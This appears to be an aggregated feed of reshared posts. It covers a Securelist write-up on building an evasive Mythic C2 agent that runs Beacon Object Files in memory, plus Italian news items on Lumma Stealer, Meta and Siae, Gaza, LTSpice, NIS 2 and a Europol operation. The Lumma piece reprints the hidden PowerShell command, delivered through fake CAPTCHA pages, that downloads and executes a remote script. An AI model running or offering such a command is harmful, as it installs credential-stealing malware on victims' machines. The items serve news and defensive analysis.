The Stage 0 module has to be written from scratch, as available tools quickly get detected by security systems and become useless for penetration testing. To implement the Stage 1 module, we settled on a hybrid approach: partially modifying existing open-source projects while implementing some features in-house. For the third module (Stage 2), we also used open-source projects with minor modifications.

This article details the implementation of the second module (Stage 1) in detail.

Formulating requirements


In light of the objectives outlined above, we will formulate the requirements for the Stage 1 module.

  1. Dynamic functionality, or modularity, for increased resilience. In addition, dynamic configuration allows adding techniques via new modules without changing the functional core.
  2. Ensuring that the third payload module (Stage 2) runs.
  3. Minimal size (100–200 KB) and minimal traces left in the system.
  4. The module must comply with OPSEC principles and allow operations to run undetected by security controls. This means we must provide a mechanism for evading signature-based memory scanning.
  5. Employing non-standard (hidden) communication channels, outside of HTTP and TCP, to establish covert persistence and avoid network detection.


Choosing the best solution


While defining the requirements, we recognized the need for a modular design. To begin, we need to determine the best way to add new features while running the tasks. One widely used method for dynamically adding functionality is reflective DLL injection, introduced in 2008. This type of injection has both its upsides and downsides. The ReflectiveLoader function is fairly easy to detect, so we’d need a custom implementation for a dynamic configuration. This is an effective yet costly way of achieving modularity, so we decided to keep looking.

The PowerShell Empire framework, whose loader is based on reflective PowerShell execution, gained popularity in the mid-2010s. The introduction of strict monitoring and rigid policies surrounding PowerShell marked the end of its era, with .NET assemblies, executed reflectively using the Assembly.Load method, gaining popularity. Around this time, toolkits like SharpSploit and GhostPack emerged. Cobalt Strike’s execute-assembly feature, introduced in 2018, allowed for .NET assembly injection into a newly created process. Process creation followed by injection is a strong indicator of compromise and is subject to rigorous monitoring. Injecting code requires considerable planning and tailored resources, plus it’s easily detectable. It’s best used after you’ve already performed initial reconnaissance and established persistence.

The next stage of framework evolution is the execution of object files in memory. An object file (COFF, Common Object File Format) is a file that represents a compiled version of the source code. Object files are typically not full-fledged programs: they are needed to link and build a project. An object file includes several important elements ensuring that the executable code functions correctly.

  • Header contains information about the architecture, timestamp, number of sections and symbols, and other metadata.
  • Sections are blocks that may include assembly code, debugging information, linker directives, exception information, and static data.
  • Symbol table contains functions and variables, and information about their location in memory.

Using object files allows you to avoid loading a CLR environment into the process, such as when using a .NET assembly and the Assembly.Load method.

Moreover, COFF is executed in the current context, without the need to create a process and inject the code into it. The feature was introduced and popularized in 2020 by the developers of the Cobalt Strike framework. And in 2021, TrustedSec developed the open-source COFF Loader that serves the same purpose: the tool loads a COFF file from disk and runs it. This functionality perfectly aligns with our objectives because it enables us to perform the required actions: surveying, gaining persistence within the system and initiating the next module via an object file – if we incorporate network retrieval and in-memory execution of the file in the project. In addition, when using COFF Loader, the pentester can remain undetected in the system for a long time.

To interact with the agent in this study, we decided to use BOFs (Beacon Object Files) designed for Cobalt Strike Beacon. The internet offers a wide variety of open-source tools and functions created for BOFs. By using different BOFs as separate modules, we can easily add new techniques at any time without modifying the agent’s core.

Another key requirement for Stage 1 is a minimal payload size. Several approaches can achieve this: for instance, using C# can result in a Stage 1 size of around 20 KB. This is quite good, but the payload will then have a dependency on the .NET framework. If we use a native language like C, the unencrypted payload will be approximately 50 KB, which fits our needs.

Our payload requirements are supported by the Mythic framework. Its microservice architecture makes it easy to add arbitrary server-side functionality. For example, the module assembly process takes place inside a container and is fully defined by us. This allows us to replace specific strings with arbitrary values if detected. Furthermore, Mythic supports both standard communication protocols (HTTPS, TCP) and covert channels, such as encrypted communication over Slack or Telegram. Finally, the use of C ensures a small payload size. All of these factors make the Mythic framework and the agent interacting with it to execute BOFs an optimal choice for launching the second module.

Communication model


In the communication process between the agent and the framework, we need to focus on three elements: payload containers, C2 profile containers, and the translation container. Payload containers hold the agent’s source code and are responsible for building the payload. C2 profile containers are responsible for communicating with the agent. They must receive traffic from the agent and send it to Mythic for further processing. The translation container handles the encryption and decryption of network traffic. We’ll be using HTTP when interacting with Mythic, so the C2 profile will be a web server listening on ports 80 and 443.

Communication flow between the agent and the Mythic framework
Communication flow between the agent and the Mythic framework

Loading an object file


To load and execute an object file, the agent must read the .text section and replace all zeros with relative addresses of external functions and static data. This is known as symbol relocation, which addresses references within a particular section of the object file. Furthermore, the agent places these symbols in memory, for example, after the code section.

To find external functions, we’ll have to analyze the libraries specified in the linker directives of the object file. To do this, we used the functions LoadLibrary, GetModuleHandle and GetProcAddress.

The diagram below clarifies how an object file is loaded and memory is allocated for its components.

Object file representation on disk (left) and in memory (right)
Object file representation on disk (left) and in memory (right)

The downsides of the solution


The method described above has a number of shortcomings. Because object file execution is blocking, multiple tasks cannot run simultaneously. For long-term tasks, other methods such as process injection are necessary; however, this is not a critical flaw for the second module, as it is not intended for long-running tasks.

Several other shortcomings are difficult to mitigate. For example, since the object file is executed in the current thread, a critical error will terminate the process. Furthermore, during the execution of the object file in memory, the VirtualAlloc function is used for section mapping and relocation. A call to this WinAPI might alert the security system.

Implementing additional functionality during development and compilation can help complicate analysis and detection for more efficient pentesting and a longer agent life cycle.

Conclusion


Mythic’s features make it a convenient pentesting tool that covers the bulk of pentesting objectives. To utilize this framework efficiently, we created an agent that extends ready-made solutions with our own code. This configuration gave us suitable flexibility and enhanced protection against detection, which is most of what a pentester asks of a working tool.


securelist.com/agent-for-mythi…



Siae, ecco come l’Antitrust ha piegato Meta sulle canzoni

L'articolo proviene da #StartMag e viene ricondiviso sulla comunità Lemmy @Informatica (Italy e non Italy 😁)
Per l’Antitrust la chiusura del procedimento segna un punto di equilibrio tra le esigenze del mercato e la tutela della concorrenza. Meta si è impegnata a negoziare in buona fede e in tempi certi, Siae vedrà includere

reshared this



GAZA. Il giornalista Hassan Aslih ucciso da un drone mentre era in ospedale


@Notizie dall'Italia e dal mondo
Il reporter era in cura per una ferita riportata durante un precedente attacco. La sua uccisione porta a 215 il numero degli operatori dell'informazione uccisi a Gaza dal 7 ottobre 2023
L'articolo GAZA. Il giornalista Hassan Aslih ucciso da un drone mentre



Simulating High-Side Bootstrap Circuits With LTSpice


LTSpice is a tool that every electronics nerd should have at least a basic knowledge of. Those of us who work professionally in the analog and power worlds rely heavily on the validity of our simulations. It’s one of the basic skills taught at college, and essential to truly understand how a circuit behaves. [Mano] has quite a collection of videos about the tool, and here is a great video explanation of how a bootstrap circuit works, enabling a high-side driver to work in the context of driving a simple buck converter. However, before understanding what a bootstrap is, we need to talk a little theory.

Bootstrap circuits are very common when NMOS (or NPN) devices are used on the high side of a switching circuit, such as a half-bridge (and by extension, a full bridge) used to drive a motor or pump current into a power supply.
A simple half-bridge driving illustrates the high-side NMOS driving problem.
From a simplistic viewpoint, due to the apparent symmetry, you’d want to have an NMOS device at the bottom and expect a PMOS device to be at the top. However, PMOS and PNP devices are weaker, rarer and more expensive than NMOS, which is all down to the device physics; simply put, the hole mobility in silicon and most other semiconductors is much lower than the electron mobility, which results in much less current. Hence, NMOS and NPN are predominant in power circuits.

As some will be aware, to drive a high-side switching transistor, such as an NPN bipolar or an NMOS device, the source end will not be at ground, but will be tied to the switching node, which for a power supply is the output voltage. You need a way to drive the gate voltage in excess of the source or emitter end by at least the threshold voltage. This is necessary to get the device to fully turn on, to give the lowest resistance, and to cause the least power dissipation. But how do you get from the logic-level PWM control waveform to what the gate needs to switch correctly?

The answer is to use a so-called bootstrap capacitor. The idea is simple enough: during one half of the driving waveform, the capacitor is charged to some fixed voltage with respect to ground, since one end of the capacitor will be grounded periodically. On the other half cycle, the previously grounded end, jumps up to the output voltage (the source end of the high side transistor) which boosts the other side of the capacitor in excess of the source (because it got charged already) providing a temporary high-voltage floating supply than can be used to drive the high-side gate, and reliably switch on the transistor. [Mano] explains it much better in a practical scenario in the video below, but now you get the why and how of the technique.

We see videos about LTSpice quite a bit, like this excellent YouTube resource by [FesZ] for starters.

youtube.com/embed/Bh9ZN6GY3qI?…


hackaday.com/2025/05/13/simula…



Sorj Chalandon – Il mio traditore
freezonemagazine.com/articoli/…
La prima volta che ho visto il mio traditore mi ha insegnato a pisciare. È stato a Belfast, al Thomas Ashe, un locale riservato agli ex prigionieri repubblicani. Ero vicino alla porta, accanto al gran camino, seduto a un tavolo sommerso di bicchieri vuoti e cadaveri di bottiglie. Era il posto preferito da Jim e […]
L'articolo Sorj Chalandon – Il mio traditore proviene da FREE ZONE


Il vantaggio competitivo del fornitore conforme: come la NIS 2 premia chi investe in sicurezza


@Informatica (Italy e non Italy 😁)
In un contesto in cui la sicurezza della catena di approvvigionamento è ormai parte integrante della compliance normativa, il fornitore non è più un attore passivo. Ecco come può trasformare gli obblighi in un vantaggio



Le solite sciocchezze #novax, che continuano a girare dopo anni e anni...


...per fortuna Bufale le smentisce, anche se in un mondo normale basterebbe il buon senso.


I vaccini anti Covid NON sono “vaccini”? butac.it/i-vaccini-anti-covid-…



Attacchi informatici in Italia: parte l’OAD 2025, l’indagine più attesa sulla sicurezza digitale


L’OAD (Osservatorio Attacchi Digitali in Italia) è l’unica indagine in Italia che raccoglie dati sugli attacchi digitali intenzionali ai sistemi informativi e sulle relative misure di sicurezza, attraverso un questionario anonimo compilabile online. L’obiettivo è fornire un quadro aggiornato e realistico della situazione della sicurezza digitale nel Paese, utile sia per le aziende che per le pubbliche amministrazioni.

Struttura dell’indagine


Il Questionario si articola in due principali parti: quella sugli attacchi subiti e rilevati nel 2024, con approfondimenti “verticali” sugli attacchi ai siti e agli ambienti web del Sistema Informativo (SI) dell’azienda/ente rispondente, sulle applicazioni/servizi basati su Intelligenza Artificiale e sugli ambienti OT, Operational Technology eventualmente utilizzati dall’Azienda/Ente rispondente; e quella sulle misure di sicurezza digitali in uso, sia tecniche che organizzative.

Questa seconda parte è opzionale ma si suggerisce di compilarla per poter avere alla fine della compilazione una macro valutazione del livello di sicurezza digitale del SI oggetto delle risposte e, nel rispondere, farsi un quadro ed una veloce verifica delle principali misure di sicurezza tecniche ed organizzative che dovrebbero/potrebbero essere implementate in ogni moderno e sicuro SI.

Al termine della compilazione, i partecipanti ricevono una valutazione qualitativa del livello di sicurezza digitale del proprio sistema informativo.

Edizione 2025


L’edizione 2025 dell’OAD è attualmente in corso, rappresentando il 18° anno consecutivo di questa iniziativa. Il questionario è disponibile online e può essere compilato da responsabili IT, CISO, CIO e altri professionisti della sicurezza informatica. I risultati dell’indagine saranno presentati in un evento previsto per l’estate 2025.

Dove trovare i rapporti


I rapporti annuali dell’OAD, contenenti analisi dettagliate e dati statistici sugli attacchi digitali in Italia, sono disponibili gratuitamente sul sito ufficiale dell’iniziativa: www.oadweb.it. Questi documenti rappresentano una risorsa preziosa per comprendere l’evoluzione delle minacce informatiche nel contesto italiano.

Compila il rapporto relativo al 2025 : oadweb.it/LS2025/limesurvey/in…

L'articolo Attacchi informatici in Italia: parte l’OAD 2025, l’indagine più attesa sulla sicurezza digitale proviene da il blog della sicurezza informatica.

Gazzetta del Cadavere reshared this.



Lumma Stealer è tornato! Il malware che ruba tutto si evolve e diventa invisibile


Lumma Stealer è un noto malware specializzato nel furto di informazioni, attivo sin dalla metà del 2022. Negli ultimi mesi ha mostrato un’evoluzione significativa nelle sue modalità operative, adottando nuove tattiche, tecniche e procedure. Questa minaccia è sempre più presente nei report relativi agli incidenti di sicurezza informatica: solo nell’ultimo anno, sono state registrate migliaia di compromissioni attribuite al malware.

Si ritiene che abbia origini nell’ambiente cybercriminale russo e venga attualmente distribuito come Malware-as-a-Service (MaaS). I suoi creatori offrono aggiornamenti frequenti e assistenza agli utenti tramite canali Telegram e una documentazione ospitata su Gitbook. L’obiettivo principale di Lumma Stealer è l’esfiltrazione di dati sensibili, come credenziali di accesso, token di sessione, wallet di criptovalute e informazioni personali raccolte dai dispositivi infetti.

Ciò che rende Lumma particolarmente pericoloso sono le sue sofisticate tecniche di distribuzione, che di recente si sono espanse fino a includere l’ingegneria sociale attraverso false domande CAPTCHA e ingannevoli richieste di download. Questi metodi sfruttano la fiducia degli utenti nei processi di verifica di sicurezza più noti , inducendo le vittime a eseguire comandi dannosi sui propri sistemi.

I ricercatori di Sophos hanno identificato diverse campagne Lumma Stealer durante l’autunno e l’inverno 2024-25, documentando come le tattiche del malware si sono evolute per eludere il rilevamento. “Le variazioni che abbiamo riscontrato nel comportamento di Lumma Stealer sono significative per i difensori”, ha osservato il team Sophos Managed Detection and Response nel suo report, sottolineando che queste tecniche di distribuzione potrebbero essere facilmente adattate ad altri malware oltre a Lumma Stealer.

Un’innovazione particolarmente preoccupante riguarda l’abuso di Windows PowerShell attraverso pagine di verifica CAPTCHA ingannevoli.
Una casella di verifica dall’aspetto familiare (Fonte Sophos)
In questa catena di attacchi, alle vittime che visitano siti dannosi viene presentata una richiesta di verifica standard “Non sono un robot”, creando un falso senso di sicurezza e legittimità. Dopo aver cliccato sulla casella di verifica, gli utenti vengono reindirizzati a una seconda pagina che chiede loro di caricare il comando “Esegui” di Windows, quindi premere Ctrl+V seguito da Invio.
La successiva richiesta di “controllo di sicurezza” è un po’ insolita, ma abbastanza semplice per gli utenti incauti (Fonte Sophos)
Questa azione apparentemente innocua in realtà incolla ed esegue un comando PowerShell nascosto che opera in una finestra nascosta:

C:\WINDOWS\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -
command $uR= hxxps[://]fixedzip[.]oss-ap-southeast5[.]aliyuncs[.]com/n
ew-artist[.]txt'; $reS=Invoke-WebRequest -Uri $uR -UseBasicParsing; $t
=$reS.Content; iex $t

L’esecuzione di questo comando avvia un sofisticato processo di attacco multifase. Lo script recupera componenti malware aggiuntivi dai server di comando e controllo, scaricando, estraendo ed eseguendo il payload principale di Lumma Stealer. Una volta attivo, questo malware accede sistematicamente ai dati del browser, come evidenziato nella Figura 6, dove Autolt3.exe accede ai dati di accesso e ai cookie di Chrome.
Flusso di attacco con abuso CAPTCHA (Fonte Sophos)
Ciò che rende questo vettore di attacco particolarmente efficace è l’impiego della crittografia AES per nascondere i payload successivi. Il malware impiega sofisticate tecniche di offuscamento, tra cui l’impiego di vettori di inizializzazione e complesse routine di decrittazione, per eludere le tradizionali misure di sicurezza. Questa combinazione di ingegneria sociale e metodi tecnici avanzati rappresenta un’evoluzione significativa nelle capacità di Lumma Stealer.

Gli esperti di sicurezza raccomandano di implementare soluzioni di protezione degli endpoint robuste con funzionalità di analisi comportamentale, poiché il solo rilevamento basato sulle firme si rivela inadeguato contro queste minacce in continua evoluzione.

L'articolo Lumma Stealer è tornato! Il malware che ruba tutto si evolve e diventa invisibile proviene da il blog della sicurezza informatica.



Operazione El Rais. Traffico di migranti gestito da egiziani smantellato dalla nostra Polizia di Stato in un contesto di cooperazione nell'ambito di una Operational Task Force di Europol


È stato estradato in Italia dall’Albania un egiziano arrestato nell’ambito dell’Operazione “El Rais”, condotta dalla Polizia di Stato di Siracusa e dal Servizio Centrale Operativo, coordinata dalla locale Direzione Distrettuale Antimafia (DDA). L’uomo è giunto a bordo di un volo partito da Tirana e atterrato nelle prime ore del pomeriggio presso l’Aeroporto di Fiumicino, scortato dagli agenti del Servizio per la Cooperazione Internazionale di Polizia e successivamente recluso presso la Casa Circondariale di Roma Rebibbia, a disposizione dell’Autorità Giudiziaria.
Si tratta di un ulteriore e significativo risultato ottenuto grazie alla sinergia e collaborazione tra le autorità italiane e quelle albanesi (Dipartimento Polizia Criminale – Forza Operazionale) con il contributo dell’Ufficio dell’Esperto per la Sicurezza operativo in Albania, che consentirà di processare in Italia uno dei componenti della complessa rete criminale dedita al traffico di migranti, operante tra l’Egitto, la Turchia e la Grecia.
L’attività, in particolare, rappresenta un seguito della vasta operazione (denominata “El Rais”) conclusa lo scorso 8 aprile, con l’esecuzione dell’ordinanza di custodia cautelare a carico di 15 egiziani ritenuti appartenenti ad uno dei più articolati e ben organizzati sodalizi dediti al traffico di migranti sulla Rotta del Mediterraneo Orientale, che si stima abbia favorito l’ingresso clandestino in Italia di almeno 3 mila persone, a partire dal 2021 a oggi, con introiti per l’organizzazione criminale di almeno 30 milioni di dollari.

L’indagine ha visto il coinvolgimento di diverse autorità e Forza di Polizia estere (albanesi, tedesche, turche e omanite), coordinate dal Servizio per la Cooperazione Internazionale di Polizia della Direzione Centrale della Polizia Criminale.
L'ordinanza era stata emessa dal Giudice per le Indagini Preliminari presso il Tribunale di Catania a seguito dell’imponente attività investigativa coordinata da questa Procura della Repubblica – Direzione Distrettuale Antimafia, condotta dal Servizio Centrale Operativo (SCO) e dalla Squadra Mobile di Siracusa in stretta sinergia con la Divisione Interpol del Servizio per la Cooperazione Internazionale di Polizia e l’Agenzia Europea EUROPOL nell’ambito dell’Operational Task Force (OTF) del “Mediterraneo orientale“.

Una operational task force di Europol è un gruppo di lavoro temporaneo e flessibile composto da esperti di polizia e investigatori provenienti da diversi paesi europei. Queste task force vengono create per affrontare specifiche minacce criminali transnazionali, come il traffico di droga, il terrorismo, il cybercrimine e altre forme di criminalità organizzata. Le principali caratteristiche di una operational task force di Europol sono:
Composizione flessibile: I membri provengono da diverse agenzie di contrasto al crimine dei paesi UE, a seconda delle esigenze dell'operazione. Obiettivi mirati: Sono create per indagare su specifici casi o fenomeni criminali di rilevanza internazionale. Coordinamento centralizzato: Vengono coordinate da Europol per massimizzare l'efficacia delle operazioni congiunte. Durata limitata: Hanno una durata limitata, attiva solo per il tempo necessario a raggiungere gli obiettivi dell'indagine.

#otf #Europol #serviziocentraleoperativo #sco #servizioperlacooperazioneinternazionaledipolizia #cooperazioneinternazionaledipolizia #direzionecentraledellapoliziacriminale #elrais #UfficiodellEspertoperlaSicurezza #trafficodiesseriumani

@Notizie dall'Italia e dal mondo